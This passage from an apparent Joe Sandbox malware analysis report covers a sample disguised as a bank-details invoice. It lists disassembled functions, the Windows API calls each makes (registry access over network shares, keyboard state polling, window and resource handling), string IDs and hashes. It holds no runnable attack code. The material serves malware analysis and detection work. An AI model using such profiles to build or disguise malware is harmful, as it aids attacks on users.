                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: BuffCharUpper
                    • String ID: $ER$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                    • API String ID: 3964851224-1405334128
                    • Opcode ID: 1ed4fefd684c6d66a21a72b8436ecc5d22ce4bd355e5928ff98ce04c1c413690
                    • Instruction ID: 0046dce7b536e69ce6b494d3cedb7070d2a8c50e114b68e1d4953ff9f3ae21f3
                    • Opcode Fuzzy Hash: 1ed4fefd684c6d66a21a72b8436ecc5d22ce4bd355e5928ff98ce04c1c413690
                    • Instruction Fuzzy Hash: 644130316142499BDF00EF11E8616EF3766BF13345F10481BEC951B396EB78AA0ACF59
                    Function 004B55BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 004B55D7
                    • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 004B5664
                    • GetMenuItemCount.USER32(00531708), ref: 004B56ED
                    • DeleteMenu.USER32(00531708,00000005,00000000,000000F5,?,?), ref: 004B577D
                    • DeleteMenu.USER32(00531708,00000004,00000000), ref: 004B5785
                    • DeleteMenu.USER32(00531708,00000006,00000000), ref: 004B578D
                    • DeleteMenu.USER32(00531708,00000003,00000000), ref: 004B5795
                    • GetMenuItemCount.USER32(00531708), ref: 004B579D
                    • SetMenuItemInfoW.USER32(00531708,00000004,00000000,00000030), ref: 004B57D3
                    • GetCursorPos.USER32(?), ref: 004B57DD
                    • SetForegroundWindow.USER32(00000000), ref: 004B57E6
                    • TrackPopupMenuEx.USER32(00531708,00000000,?,00000000,00000000,00000000), ref: 004B57F9
                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 004B5805
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                    • String ID:
                    • API String ID: 3993528054-0
                    • Opcode ID: 200966b486115da2531def57ff437379dafa4b8442264c318e2717f657b410a2
                    • Instruction ID: d36472a902a19f149e368a04c9e98804eb425c6e6bb1a3a0cc1cd7e4339ebe2d
                    • Opcode Fuzzy Hash: 200966b486115da2531def57ff437379dafa4b8442264c318e2717f657b410a2
                    • Instruction Fuzzy Hash: 3A71F270640605BEEB209B55CC49FEAFF65FF44368F240217F518AA2D1C7785820DBA9
                    Function 004AA14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 004AA1DC
                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004AA211
                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 004AA22D
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 004AA249
                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 004AA273
                    • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 004AA29B
                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 004AA2A6
                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 004AA2AB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                    • API String ID: 1687751970-22481851
                    • Opcode ID: eba71e615bbb0326d37ca8767acb7a7b32bebc288a4c098c801fb98ea151f44a
                    • Instruction ID: 6db10fe0a7b7a29fdf74ae0e969f89b6e8611ba2ba8d5d7015baccb5ad2b4048
                    • Opcode Fuzzy Hash: eba71e615bbb0326d37ca8767acb7a7b32bebc288a4c098c801fb98ea151f44a
                    • Instruction Fuzzy Hash: 3C411876C10229AECB15EBA5DC85DEEB778FF15304F40806AF805A7260EB74AE15CB94
                    Function 004B67E9 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 107windowCOMMON
                    Download Yara Rule
                    APIs
                    • __swprintf.LIBCMT ref: 004B67FD
                    • __swprintf.LIBCMT ref: 004B680A
                      • Part of subcall function 0049172B: __woutput_l.LIBCMT ref: 00491784
                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 004B6834
                    • LoadResource.KERNEL32(?,00000000), ref: 004B6840
                    • LockResource.KERNEL32(00000000), ref: 004B684D
                    • FindResourceW.KERNEL32(?,?,00000003), ref: 004B686D
                    • LoadResource.KERNEL32(?,00000000), ref: 004B687F
                    • SizeofResource.KERNEL32(?,00000000), ref: 004B688E
                    • LockResource.KERNEL32(?), ref: 004B689A
                    • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 004B68F9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                    • String ID: 5R
                    • API String ID: 1433390588-3278202610
                    • Opcode ID: 976d5d0b8725330a46d4388e5c82f8a701f4588da434957d6aa6758a79967bb5
                    • Instruction ID: 3669d706317a6b39538b69ea9621a0461f7712e95956fea19f6037252cb75fe6
                    • Opcode Fuzzy Hash: 976d5d0b8725330a46d4388e5c82f8a701f4588da434957d6aa6758a79967bb5
                    • Instruction Fuzzy Hash: A231937190121AABDB11AFA1DD45AFF7BA9FF08341F014826F901D2250E738DA21DBB8
                    Function 004B25B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,004E36F4,00000010,?,Bad directive syntax error,0050DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 004B25D6
                    • LoadStringW.USER32(00000000,?,004E36F4,00000010), ref: 004B25DD
                    • _wprintf.LIBCMT ref: 004B2610
                    • __swprintf.LIBCMT ref: 004B2632
                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 004B26A1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                    • API String ID: 1080873982-4153970271
                    • Opcode ID: 04bf88c090eda57ceca55a614adef43a09c3e5c228c0efab908805f8fcf63d03
                    • Instruction ID: e1ce2a45e1eb5eb8b1b27fae5eae81a18e99242f221ec6d9e4f71a31d1353a2c
                    • Opcode Fuzzy Hash: 04bf88c090eda57ceca55a614adef43a09c3e5c228c0efab908805f8fcf63d03
                    • Instruction Fuzzy Hash: B921513180021ABFCF11AB91DC46EEE7B35FF19308F00446AF505660A2DB79A625DB65
                    Function 004B7AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                    Download Yara Rule
                    APIs
                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 004B7B42
                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 004B7B58
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004B7B69
                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 004B7B7B
                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 004B7B8C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: SendString
                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                    • API String ID: 890592661-1007645807
                    • Opcode ID: 70f6052b2fb60cb68b3c7fd178cbe2b006f3154250fea3e088dfd7f69819f05a
                    • Instruction ID: 045a6870d99a8fac17f670f7e3111817e9ce934044b07286816ab6e3bf9d5758
                    • Opcode Fuzzy Hash: 70f6052b2fb60cb68b3c7fd178cbe2b006f3154250fea3e088dfd7f69819f05a
                    • Instruction Fuzzy Hash: 5B11C8A0A5026979DB24B362DC8ADFF7F7CEFD2B14F04042E7415A60D1DE681B45C9B4
                    Function 004B778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • timeGetTime.WINMM ref: 004B7794
                      • Part of subcall function 0048DC38: timeGetTime.WINMM(?,75A8B400,004E58AB), ref: 0048DC3C
                    • Sleep.KERNEL32(0000000A), ref: 004B77C0
                    • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 004B77E4
                    • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 004B7806
                    • SetActiveWindow.USER32 ref: 004B7825
                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 004B7833
                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 004B7852
                    • Sleep.KERNEL32(000000FA), ref: 004B785D
                    • IsWindow.USER32 ref: 004B7869
                    • EndDialog.USER32(00000000), ref: 004B787A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                    • String ID: BUTTON
                    • API String ID: 1194449130-3405671355
                    • Opcode ID: 95006cd7fcd01b5b5d592fafd3d6d1f4c8d54b249b585085b925947ff613d643
                    • Instruction ID: 3744457b3fdb98824aebd2104aa58c098193920834b2dda9cba89784ee7e9671
                    • Opcode Fuzzy Hash: 95006cd7fcd01b5b5d592fafd3d6d1f4c8d54b249b585085b925947ff613d643
                    • Instruction Fuzzy Hash: 822142B4604205AFE7016B20EC89BB63F6AFB94748B104466F50682371CF7D5D19EB3D
                    Function 004C02EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0047936C: __swprintf.LIBCMT ref: 004793AB
                      • Part of subcall function 0047936C: __itow.LIBCMT ref: 004793DF
                    • CoInitialize.OLE32(00000000), ref: 004C034B
                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 004C03DE
                    • SHGetDesktopFolder.SHELL32(?), ref: 004C03F2
                    • CoCreateInstance.OLE32(004FDA8C,00000000,00000001,00523CF8,?), ref: 004C043E
                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 004C04AD
                    • CoTaskMemFree.OLE32(?,?), ref: 004C0505
                    • _memset.LIBCMT ref: 004C0542
                    • SHBrowseForFolderW.SHELL32(?), ref: 004C057E
                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 004C05A1
                    • CoTaskMemFree.OLE32(00000000), ref: 004C05A8
                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 004C05DF
                    • CoUninitialize.OLE32(00000001,00000000), ref: 004C05E1
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                    • String ID:
                    • API String ID: 1246142700-0
                    • Opcode ID: b9f234d4afabba37a3f4dffe8a8fac6f67b4a40a1f9e3271d4f983531c8a4761
                    • Instruction ID: 323e176503a0360e6b38b7d579b1a7f5a7d041275537713eeb78210fd39ce3d2
                    • Opcode Fuzzy Hash: b9f234d4afabba37a3f4dffe8a8fac6f67b4a40a1f9e3271d4f983531c8a4761
                    • Instruction Fuzzy Hash: 82B1CB75A00109EFDB54DFA5C888EAEBBB9FF48304B1484AAE909EB251D734ED41CF54
                    Function 004B2E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                    Download Yara Rule
                    APIs
                    • GetKeyboardState.USER32(?), ref: 004B2ED6
                    • SetKeyboardState.USER32(?), ref: 004B2F41
                    • GetAsyncKeyState.USER32(000000A0), ref: 004B2F61
                    • GetKeyState.USER32(000000A0), ref: 004B2F78
                    • GetAsyncKeyState.USER32(000000A1), ref: 004B2FA7
                    • GetKeyState.USER32(000000A1), ref: 004B2FB8
                    • GetAsyncKeyState.USER32(00000011), ref: 004B2FE4
                    • GetKeyState.USER32(00000011), ref: 004B2FF2
                    • GetAsyncKeyState.USER32(00000012), ref: 004B301B
                    • GetKeyState.USER32(00000012), ref: 004B3029
                    • GetAsyncKeyState.USER32(0000005B), ref: 004B3052
                    • GetKeyState.USER32(0000005B), ref: 004B3060
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: State$Async$Keyboard
                    • String ID:
                    • API String ID: 541375521-0
                    • Opcode ID: 2bb1b52ba2f14125c09dd232d4d402b5e7fad2559563941e974ed148f7702e62
                    • Instruction ID: ab4c44cf338e59b664318891cfcb39d644f66f5774cbabe85fee8a45b1cadafb
                    • Opcode Fuzzy Hash: 2bb1b52ba2f14125c09dd232d4d402b5e7fad2559563941e974ed148f7702e62
                    • Instruction Fuzzy Hash: 1B51E720A0878429FB35EBA589507EBBFF45F11344F08459FD5C25A2C2DA9C9B8CC77A
                    Function 004AED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                    Download Yara Rule
                    APIs
                    • GetDlgItem.USER32(?,00000001), ref: 004AED1E
                    • GetWindowRect.USER32(00000000,?), ref: 004AED30
                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 004AED8E
                    • GetDlgItem.USER32(?,00000002), ref: 004AED99
                    • GetWindowRect.USER32(00000000,?), ref: 004AEDAB
                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 004AEE01
                    • GetDlgItem.USER32(?,000003E9), ref: 004AEE0F
                    • GetWindowRect.USER32(00000000,?), ref: 004AEE20
                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 004AEE63
                    • GetDlgItem.USER32(?,000003EA), ref: 004AEE71
                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 004AEE8E
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004AEE9B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Window$ItemMoveRect$Invalidate
                    • String ID:
                    • API String ID: 3096461208-0
                    • Opcode ID: 6bb64293039bf70f74ee7e512148aa1f40570270281e32b131170c7eac74dba9
                    • Instruction ID: d7b63ea7c4fd7bf894d7fdcaf70b72b1a40377300da46483fc663352bad395de
                    • Opcode Fuzzy Hash: 6bb64293039bf70f74ee7e512148aa1f40570270281e32b131170c7eac74dba9
                    • Instruction Fuzzy Hash: C9510EB1B00205AFDB18CF69DD89AAEBBBAFB99701F148139F519D7290D7749D00CB14
                    Function 0048B73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0048B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0048B759,?,00000000,?,?,?,?,0048B72B,00000000,?), ref: 0048BA58
                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0048B72B), ref: 0048B7F6
                    • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0048B72B,00000000,?,?,0048B2EF,?,?), ref: 0048B88D
                    • DestroyAcceleratorTable.USER32(00000000), ref: 004ED8A6
                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0048B72B,00000000,?,?,0048B2EF,?,?), ref: 004ED8D7
                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0048B72B,00000000,?,?,0048B2EF,?,?), ref: 004ED8EE
                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0048B72B,00000000,?,?,0048B2EF,?,?), ref: 004ED90A
                    • DeleteObject.GDI32(00000000), ref: 004ED91C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                    • String ID:
                    • API String ID: 641708696-0
                    • Opcode ID: 268fa37ab0fe41d8d8953c91bf2fd485a706e7ad198cbac54677a933c68e770c
                    • Instruction ID: 6225feb164f02ed5758b3c1577845bbf360c0928211591d591c30b7d806a8e2b
                    • Opcode Fuzzy Hash: 268fa37ab0fe41d8d8953c91bf2fd485a706e7ad198cbac54677a933c68e770c
                    • Instruction Fuzzy Hash: D2618E30901B40DFDB26AF65DC89B2A77F5FB54316F14092EE04286B60CB38A895DB8D
                    Function 0048B40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0048B526: GetWindowLongW.USER32(?,000000EB), ref: 0048B537
                    • GetSysColor.USER32(0000000F), ref: 0048B438
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ColorLongWindow
                    • String ID:
                    • API String ID: 259745315-0
                    • Opcode ID: c648b7b4a093f81368650867b2efb7c852786b6c38bb4efd99fced69c100b01d
                    • Instruction ID: b09a1d8e3d5ce2f12153bcb1cd04b86a3cb49a8164f789479431150d25a1bd4d
                    • Opcode Fuzzy Hash: c648b7b4a093f81368650867b2efb7c852786b6c38bb4efd99fced69c100b01d
                    • Instruction Fuzzy Hash: 5341B730400540AFDB216F28DC4ABBE3B66EB06B31F144666FDA58E2E6D7348C52D769
                    Function 004B690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                    • String ID:
                    • API String ID: 136442275-0
                    • Opcode ID: 72a6806e065a55134bf29cdb4ea7525ac7cee1eabd548a54cd0aa5e1f94b7c7d
                    • Instruction ID: 0bd62e9489edd4cc7f56898387120bbc69719b2cc7fec71fe57248e5add34e9a
                    • Opcode Fuzzy Hash: 72a6806e065a55134bf29cdb4ea7525ac7cee1eabd548a54cd0aa5e1f94b7c7d
                    • Instruction Fuzzy Hash: DA41817688511CAECF61DB95CC41CCF77BCEF44310F0041A7B649A2051EA38ABE48F68
                    Function 004BD76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON
                    Download Yara Rule
                    APIs
                    • CharLowerBuffW.USER32(0050DC00,0050DC00,0050DC00), ref: 004BD7CE
                    • GetDriveTypeW.KERNEL32(?,00523A70,00000061), ref: 004BD898
                    • _wcscpy.LIBCMT ref: 004BD8C2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: BuffCharDriveLowerType_wcscpy
                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                    • API String ID: 2820617543-1000479233
                    • Opcode ID: d48646ba8cb40db6bfeafa9607aacade0f856c5f332afe843f4d22967aeae0d6
                    • Instruction ID: b99668da54f8937fe7ecc74a044b78b5fdaf0b1cffce4613f733682aaea79ce6
                    • Opcode Fuzzy Hash: d48646ba8cb40db6bfeafa9607aacade0f856c5f332afe843f4d22967aeae0d6
                    • Instruction Fuzzy Hash: 745182319042009FC700FF15D881AAFB7A5FF85318F10886EF4A957292EB39DD05CB5A
                    Function 0047936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                    Download Yara Rule
                    APIs
                    • __swprintf.LIBCMT ref: 004793AB
                    • __itow.LIBCMT ref: 004793DF
                      • Part of subcall function 00491557: _xtow@16.LIBCMT ref: 00491578
                    Strings
                    Memory Dump Source
